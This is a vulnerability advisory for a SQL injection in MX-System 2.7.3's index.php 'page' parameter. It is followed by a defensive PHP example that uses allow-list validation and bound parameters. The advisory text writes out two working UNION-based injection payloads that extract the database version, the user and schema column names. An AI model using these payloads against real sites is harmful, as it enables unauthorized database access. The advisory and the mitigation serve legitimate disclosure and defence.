Vendor: MX-System
By: cOndemned
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: MX-System
Affected Version From: 2.7.2003
Affected Version To: 2.7.2003
Patch Exists: NO
Related CWE: N/A
CPE: a:mx-system:mx-system:2.7.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability
A vulnerability exists in MX-System 2.7.3 which allows an attacker to inject arbitrary SQL commands via the 'page' parameter in the 'index.php' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. This can be done by sending a request with the 'page' parameter set to -1 union select 1,2,3,4,5,concat_ws(char(58),version(),user(),now())/* or -1 union select 1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns/*. This will generate an error page containing the requested information.
Mitigation:
Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
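The mitigation above, as an added PHP example that is not MX-System's own code: the 'page' value is accepted only if it is a plain positive integer, and it reaches the database solely as a bound parameter. The `pages` table, its columns, the function names and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Stand-in for the application's database: an in-memory SQLite table named
// `pages` (table and column names are assumptions, not taken from MX-System).
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $db->exec("INSERT INTO pages (id, title, body) VALUES (1, 'Home', 'Welcome')");
    return $db;
}

// Allow-list validation: `page` must be a string of 1 to 9 decimal digits with
// no leading zero. Arrays (page[]=1), signs, spaces and SQL text are rejected.
function parse_page_id($raw): ?int
{
    if (!is_string($raw) || preg_match('/\A[1-9][0-9]{0,8}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

// The validated id is bound as an integer parameter, never concatenated into SQL.
function load_page(PDO $db, $rawPage): ?array
{
    $id = parse_page_id($rawPage);
    if ($id === null) {
        return null; // caller should answer with a generic 404, not a database error page
    }
    $stmt = $db->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a legitimate id, the first string quoted in the advisory, an array.
$db = make_demo_db();
$inputs = [
    '1',
    '-1 union select 1,2,3,4,5,concat_ws(char(58),version(),user(),now())/*',
    ['1'],
];
foreach ($inputs as $raw) {
    $row = load_page($db, $raw);
    echo json_encode($raw), ' => ', $row === null ? 'rejected or not found' : $row['title'], PHP_EOL;
}
```

In a real handler the value would come from `$_GET['page']`, and database exceptions would be logged server-side rather than rendered into the response.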